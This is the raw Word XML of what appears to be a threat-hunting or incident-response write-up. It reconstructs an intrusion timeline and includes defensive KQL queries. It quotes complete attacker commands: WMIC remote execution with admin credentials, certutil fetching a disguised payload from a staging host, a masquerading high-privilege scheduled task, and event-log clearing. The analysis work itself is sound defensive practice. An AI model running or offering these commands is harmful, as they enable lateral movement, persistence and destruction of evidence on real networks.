        <w:t>” is created to run the previously downloaded payload “RuntimeBroker.exe”</w:t>
      </w:r>
      <w:r w:rsidR="31FDABB8">
        <w:rPr/>
        <w:t xml:space="preserve"> daily at 3:00 a.m. with the highest privileges. Thi</w:t>
      </w:r>
      <w:r w:rsidR="70A174D7">
        <w:rPr/>
        <w:t xml:space="preserve">s task creation is </w:t>
      </w:r>
      <w:r w:rsidR="3F6E8EC2">
        <w:rPr/>
        <w:t>forced to</w:t>
      </w:r>
      <w:r w:rsidR="70A174D7">
        <w:rPr/>
        <w:t xml:space="preserve"> override </w:t>
      </w:r>
      <w:r w:rsidR="2AF54C18">
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidR="70A174D7">
        <w:rPr/>
        <w:t xml:space="preserve"> existing task with the same name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A1174B6" w:rsidP="65FB3171" w:rsidRDefault="7A1174B6" w14:paraId="7C84E837" w14:textId="01D7C1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1174B6">
        <w:rPr/>
        <w:t>"schtasks.exe" /create /tn MicrosoftEdgeUpdateCheck /tr C:\Users\Public\RuntimeBroker.exe /sc daily /st 03:00 /rl highest /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A1174B6" w:rsidP="65FB3171" w:rsidRDefault="7A1174B6" w14:paraId="578AD73A" w14:textId="790CF9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1174B6">
        <w:drawing>
          <wp:inline wp14:editId="10492C7F" wp14:anchorId="26441FDF">
            <wp:extent cx="5943600" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1821618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618982" name="Picture 1821618982"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId835395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A22F0" w:rsidP="65FB3171" w:rsidRDefault="010A22F0" w14:paraId="4A729198" w14:textId="0FFC76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10A22F0">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:53:36.0171308Z - </w:t>
      </w:r>
      <w:r w:rsidR="3388D794">
        <w:rPr/>
        <w:t>WMIC is used to connect to 10.1.0.203 with the Administrator account us</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3388D79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e CMD to run </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3388D79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CertUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3388D79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to connect to </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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“</w:t>
      </w:r>
      <w:hyperlink r:id="Rfea5c113462048af">
        <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12E">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="" w:cs="" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
          </w:rPr>
          <w:t>https://sync.cloud-endpoint.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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“</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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download </w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="2CA2A2E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“</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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Daniel_Richardson_CV.pdf.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="124E680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</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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to “</w:t>
      </w:r>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3C23B12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C:\Users\Public\” as “RuntimeBroker.exe.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3388D794" w:rsidP="65FB3171" w:rsidRDefault="3388D794" w14:paraId="6B9AF6D9" w14:textId="1B3225FD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="3388D794">
        <w:rPr/>
        <w:t>“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>"WMIC.exe" /node:10.1.0.203 /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>user:Administrator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>password:*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******* process call create "cmd.exe /c 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>certutil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>urlcache</w:t>
      </w:r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-split -f </w:t>
      </w:r>
      <w:hyperlink r:id="R4ae91f2a11874617">
        <w:r w:rsidRPr="65FB3171" w:rsidR="3388D7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https://sync.cloud-endpoint.net/Daniel_Richardson_CV.pdf.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="65FB3171" w:rsidR="3388D7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C:\Users\Public\RuntimeBroker.exe"”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3388D794" w:rsidP="65FB3171" w:rsidRDefault="3388D794" w14:paraId="6CDEFBE6" w14:textId="36668913">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="3388D794">
        <w:drawing>
          <wp:inline wp14:editId="35815E37" wp14:anchorId="7CA21A8D">
            <wp:extent cx="5943600" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="460395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395314" name="Picture 460395314"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId8479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6016B" w:rsidP="65FB3171" w:rsidRDefault="2CD6016B" w14:paraId="18737A94" w14:textId="0B00887D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="2CD6016B">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:54:55.7957282Z - MSTC is </w:t>
      </w:r>
      <w:r w:rsidR="2CD6016B">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="2CD6016B">
        <w:rPr/>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="2CD6016B">
        <w:rPr/>
        <w:t>pivot to</w:t>
      </w:r>
      <w:r w:rsidR="2CD6016B">
        <w:rPr/>
        <w:t xml:space="preserve"> 10.1.0.203.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2CD6016B" w:rsidP="65FB3171" w:rsidRDefault="2CD6016B" w14:paraId="6B2C30C1" w14:textId="64025D0B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="2CD6016B">
        <w:drawing>
          <wp:inline wp14:editId="67FAAA8B" wp14:anchorId="393CE029">
            <wp:extent cx="5943600" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="639531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531151" name="Picture 639531151"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1177275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1044D" w:rsidP="65FB3171" w:rsidRDefault="7571044D" w14:paraId="017B1ED7" w14:textId="2F1A78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71044D">
        <w:rPr/>
        <w:t>2026-01-15T04:56:52.1863624Z</w:t>
      </w:r>
      <w:r w:rsidR="13554D00">
        <w:rPr/>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="13554D00">
        <w:rPr/>
        <w:t>Certutil is then used to reach out to the payload staging site “</w:t>
      </w:r>
      <w:hyperlink r:id="Rdeef38e0b6654699">
        <w:r w:rsidRPr="65FB3171" w:rsidR="13554D00">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sync.cloud-endpoint.net/”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="13554D00">
        <w:rPr/>
        <w:t xml:space="preserve"> to download “Daniel_Richardson_CV.pdf.exe” to “C:\Users\Public\” as “RuntimeBroker.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="13554D00" w:rsidP="65FB3171" w:rsidRDefault="13554D00" w14:paraId="74C6FA92" w14:textId="0309DA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554D00">
        <w:rPr/>
        <w:t>"certutil.exe" -urlcache -split -f https://sync.cloud-endpoint.net/Daniel_Richardson_CV.pdf.exe C:\Users\Public\RuntimeBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="13554D00" w:rsidP="65FB3171" w:rsidRDefault="13554D00" w14:paraId="100FE519" w14:textId="57543370">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="13554D00">
        <w:drawing>
          <wp:inline wp14:editId="15A4438A" wp14:anchorId="1C69FA95">
            <wp:extent cx="5943600" cy="276225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="319072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072827" name="Picture 319072827"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId509177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54D00" w:rsidP="65FB3171" w:rsidRDefault="13554D00" w14:paraId="356C0A9C" w14:textId="7B7ADB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554D00">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:56:59.3404574Z - </w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>A scheduled task named “</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>MicrosoftEdgeUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve">” is created to run the previously downloaded payload “RuntimeBroker.exe” daily at 3:00 a.m. with the highest privileges. This task creation is </w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>forced to</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> override any existing task with the same name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A8B049A" w:rsidP="65FB3171" w:rsidRDefault="5A8B049A" w14:paraId="458CB244" w14:textId="017BF1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8B049A">
        <w:rPr/>
        <w:t>"schtasks.exe" /create /</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>tn</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>MicrosoftEdgeUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> /tr C:\Users\Public\RuntimeBroker.exe /</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>sc</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> daily /</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> 03:00 /</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t>rl</w:t>
      </w:r>
      <w:r w:rsidR="5A8B049A">
        <w:rPr/>
        <w:t xml:space="preserve"> highest /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D27A08C" w:rsidP="65FB3171" w:rsidRDefault="5D27A08C" w14:paraId="0FD6A1DA" w14:textId="07A2DA83">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5D27A08C">
        <w:drawing>
          <wp:inline wp14:editId="2613373B" wp14:anchorId="296B87FE">
            <wp:extent cx="5943600" cy="257175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1003791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791670" name="Picture 1003791670"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1253503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E050A5" w:rsidP="65FB3171" w:rsidRDefault="17E050A5" w14:paraId="55AEAB64" w14:textId="5DC03272">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E050A5">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:57:05.4060899Z - </w:t>
      </w:r>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t>Certutil was utilized to download AnyDesk to C:\Users\Public\AnyDesk.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="31539B3F" w:rsidP="65FB3171" w:rsidRDefault="31539B3F" w14:paraId="3D9BAAF5" w14:textId="5BF61D82">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t>cmd.exe /c "</w:t>
      </w:r>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t>certutil</w:t>
      </w:r>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t>urlcache</w:t>
      </w:r>
      <w:r w:rsidR="31539B3F">
        <w:rPr/>
        <w:t xml:space="preserve"> -split -f https://download.anydesk.com/AnyDesk.exe C:\Users\Public\AnyDesk.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="17E050A5" w:rsidP="65FB3171" w:rsidRDefault="17E050A5" w14:paraId="5EE560B6" w14:textId="3408DE08">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="17E050A5">
        <w:drawing>
          <wp:inline wp14:editId="72D28797" wp14:anchorId="361A87D6">
            <wp:extent cx="5943600" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="920528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528859" name="Picture 920528859"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1696143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851251" w:rsidP="65FB3171" w:rsidRDefault="34851251" w14:paraId="6D2CB08A" w14:textId="0893043F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="34851251">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T04:59:04.4113272Z - </w:t>
      </w:r>
      <w:r w:rsidR="6B901ECE">
        <w:rPr/>
        <w:t xml:space="preserve">7zip is </w:t>
      </w:r>
      <w:r w:rsidR="6B901ECE">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="6B901ECE">
        <w:rPr/>
        <w:t xml:space="preserve"> to archive a file to “C:\” as “Shares.7z” with an initiating process of “Explorer</w:t>
      </w:r>
      <w:r w:rsidR="591F4246">
        <w:rPr/>
        <w:t>.exe.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="34851251" w:rsidP="65FB3171" w:rsidRDefault="34851251" w14:paraId="036822B4" w14:textId="3F41F45E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="34851251">
        <w:drawing>
          <wp:inline wp14:editId="161CB3B0" wp14:anchorId="7B9121AA">
            <wp:extent cx="5943600" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="225755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755263" name="Picture 225755263"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId125537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8CD48" w:rsidP="65FB3171" w:rsidRDefault="4948CD48" w14:paraId="74DB1CE0" w14:textId="7A75C2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48CD48">
        <w:rPr/>
        <w:t xml:space="preserve">2026-01-15T05:07:42.8142099Z - Then </w:t>
      </w:r>
      <w:r w:rsidR="4948CD48">
        <w:rPr/>
        <w:t>wevtutil</w:t>
      </w:r>
      <w:r w:rsidR="4948CD48">
        <w:rPr/>
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r w:rsidR="4948CD48">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="4948CD48">
        <w:rPr/>
        <w:t xml:space="preserve"> to clear the Security, System, Application, and PowerShell logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4948CD48" w:rsidP="65FB3171" w:rsidRDefault="4948CD48" w14:paraId="332D8FD2" w14:textId="356B5BBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="4948CD48">
        <w:drawing>
          <wp:inline wp14:editId="683B2851" wp14:anchorId="65979373">
            <wp:extent cx="5943600" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27860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605751" name="Picture 278605751"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId90203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A39C6" w:rsidP="65FB3171" w:rsidRDefault="125A39C6" w14:paraId="308C9085" w14:textId="1EF90D21">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="125A39C6">
        <w:rPr/>
        <w:t xml:space="preserve">Persistence </w:t>
      </w:r>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t>Payload IOC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="618A83D3" w14:textId="33637994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>KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="353CDFF1" w14:textId="301CBA74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DeviceFileEvents </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="5F7464EF" w14:textId="14EA4937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| where SHA256 =~ "48b97fd91946e81e3e7742b3554585360551551cbf9398e1f34f4bc4eac3a6b5" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="1A647BB0" w14:textId="6812AE59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//| where DeviceName =~ "AS-PC1" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="258B68A8" w14:textId="0988C7CE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| project Timestamp, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="7516AD6D" w14:textId="2E04B52D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DeviceName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="641FEDD8" w14:textId="79118E49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ActionType, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="3246B487" w14:textId="40058C0B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FileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="1434E41D" w14:textId="1B3B4C94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SHA256,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="7E260272" w14:textId="41FF3EC2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InitiatingProcessFileName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="644A7DF9" w14:textId="7CA63650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InitiatingProcessId, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="159E099D" w14:textId="102D95CC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ReportId, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="59FBA322" w14:textId="22477787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          AdditionalFields </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="202CEF2B" w14:textId="452D91C3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| order by Timestamp </w:t>
      </w:r>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t>asc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="2D9DE27F" w14:textId="7B6BDE9E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t xml:space="preserve">We see the </w:t>
      </w:r>
      <w:r w:rsidR="4273CD7C">
        <w:rPr/>
        <w:t xml:space="preserve">persistence </w:t>
      </w:r>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t>utilized</w:t>
      </w:r>
      <w:r w:rsidR="26BBD66D">
        <w:rPr/>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidR="29412CFB">
        <w:rPr/>
        <w:t>devices “as-pc2” and “as-</w:t>
      </w:r>
      <w:r w:rsidR="29412CFB">
        <w:rPr/>
        <w:t>srv</w:t>
      </w:r>
      <w:r w:rsidR="29412CFB">
        <w:rPr/>
        <w:t>” under the file names:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF8CC0D" w:rsidP="65FB3171" w:rsidRDefault="5AF8CC0D" w14:paraId="42208366" w14:textId="7044E8EC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>256599A0CC56C8F3A67AF19C44165DC6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF8CC0D" w:rsidP="65FB3171" w:rsidRDefault="5AF8CC0D" w14:paraId="79954E36" w14:textId="28688D2C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>Daniel_Richardson_CV.pdf[</w:t>
      </w:r>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>1].exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF8CC0D" w:rsidP="65FB3171" w:rsidRDefault="5AF8CC0D" w14:paraId="164BB21D" w14:textId="21B69A6A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>RuntimeBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF8CC0D" w:rsidP="65FB3171" w:rsidRDefault="5AF8CC0D" w14:paraId="213261E2" w14:textId="3131FCE3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>256599A0CC56C8F3A67AF19C44165DC6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF8CC0D" w:rsidP="65FB3171" w:rsidRDefault="5AF8CC0D" w14:paraId="61DE8997" w14:textId="3C77F57C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5AF8CC0D">
        <w:rPr/>
        <w:t>RuntimeBroker.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26BBD66D" w:rsidP="65FB3171" w:rsidRDefault="26BBD66D" w14:paraId="3D16861C" w14:textId="3A17E832">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="26BBD66D">
        <w:drawing>
          <wp:inline wp14:editId="5896F28A" wp14:anchorId="0EA1FB71">
            <wp:extent cx="5943600" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2061901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901329" name="Picture 2061901329"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1524156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4E032" w:rsidP="65FB3171" w:rsidRDefault="3754E032" w14:paraId="6A1A74AD" w14:textId="78383D7F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="3754E032">
        <w:rPr/>
        <w:t>AnyDesk.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5616E583" w:rsidP="65FB3171" w:rsidRDefault="5616E583" w14:paraId="738554FB" w14:textId="1430319B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="5616E583">
        <w:rPr/>
        <w:t>KQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="43430BDA" w14:textId="03C24BF9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DeviceFileEvents </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="2E9AEE26" w14:textId="583F1B4F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>| where FileName =~ "AnyDesk.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="6E7BA1F3" w14:textId="5A20A92F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//| where DeviceName =~ "AS-PC1" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="66471E94" w14:textId="2AD9E436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| project Timestamp, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="133E4FA4" w14:textId="7592AA1C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DeviceName, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="1F5C15B4" w14:textId="6533B7ED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ActionType, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="047FA63F" w:rsidP="65FB3171" w:rsidRDefault="047FA63F" w14:paraId="2FE63FF5" w14:textId="30647B1C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FileName, </w:t>
      </w:r>
    </w:p>
